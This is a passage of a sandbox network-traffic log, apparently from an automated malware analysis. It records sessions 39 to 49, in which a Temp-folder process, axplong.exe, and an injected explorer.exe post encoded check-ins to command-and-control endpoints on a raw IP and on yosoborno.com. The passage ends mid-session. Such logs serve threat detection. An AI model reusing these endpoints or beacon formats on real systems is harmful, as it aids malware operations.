Aug 26, 2024 23:30:00.609783888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49776	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:59.637681961 CEST	276	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vxvqsoujtjkuxr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: yosoborno.com
Aug 26, 2024 23:29:59.637703896 CEST	301	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2a 4b fa a2 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu*KmmN5!FXa}]jo{^UO89z+%c?n.vdsr/F>3msLJxU}.R/
Aug 26, 2024 23:30:00.735038042 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49777	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:00.723170042 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:01.478326082 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:01.479146957 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:01.740863085 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49778	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:00.743275881 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xbebpqvhoemyp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 181 Host: yosoborno.com
Aug 26, 2024 23:30:00.743297100 CEST	181	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 56 08 ed 96 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vuVWDhZgjlQtE@3j2EF3@71rA_+y(%Q
Aug 26, 2024 23:30:01.845020056 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49779	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:01.853382111 CEST	278	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mxqvkuhtvdmvoqus.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: yosoborno.com
Aug 26, 2024 23:30:01.853393078 CEST	222	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3e 2f be fb Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu>/a#x<~U8hQA+i% K{iB_xFv&(F:;/&+P-5
Aug 26, 2024 23:30:02.960076094 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49780	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:01.862694979 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:02.615040064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:02.615875006 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:02.878446102 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49781	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:02.971236944 CEST	274	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oddsieoecyts.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 150 Host: yosoborno.com
Aug 26, 2024 23:30:02.972908974 CEST	150	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 5f 17 c5 a2 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu_^bWn2>SKQwa'WcTLSB[GFMqy]v
Aug 26, 2024 23:30:04.074687004 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49782	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:02.989249945 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:03.737163067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:03.738038063 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:03.986056089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49783	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:04.085742950 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://irppgyjsfec.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: yosoborno.com
Aug 26, 2024 23:30:04.085742950 CEST	320	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 46 50 e9 e3 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vuFPQWpKNB[73SN#~c:^@AQFVLuJN0E2LOE>T^%C<@)'L8}?JS
Aug 26, 2024 23:30:05.185064077 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49784	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:04.099881887 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 26, 2024 23:30:04.856271029 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 26, 2024 23:30:04.857024908 CEST	316	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Aug 26, 2024 23:30:05.177614927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:30:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49785	46.100.50.5	80	4056	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:30:05.201637030 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wguxftgkott.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: yosoborno.com
Aug 26, 2024 23:30:05.201651096 CEST	271	OUT	Data Raw: 3b 6e 23 17 85 cc 6b 52 d9 a9 c5 06 06 04 72 c9 7e 0b ba e3 6b 01 9f 67 09 75 09 e5 47 c0 b3 1e ed 58 cf 2b 05 1f 22 1d 9a 9b 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 23 02 ba e8 Data Ascii: ;n#kRr~kguGX+"?=8kI?pLM@NA -[k,vu#sNpPpyX%$.:V)lK<S*,F5M":RrBLL-W\2-LWd+lM^4}+ye[7
Aug 26, 2024 23:30:06.273185015 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 26 Aug 2024 21:30:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49786	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
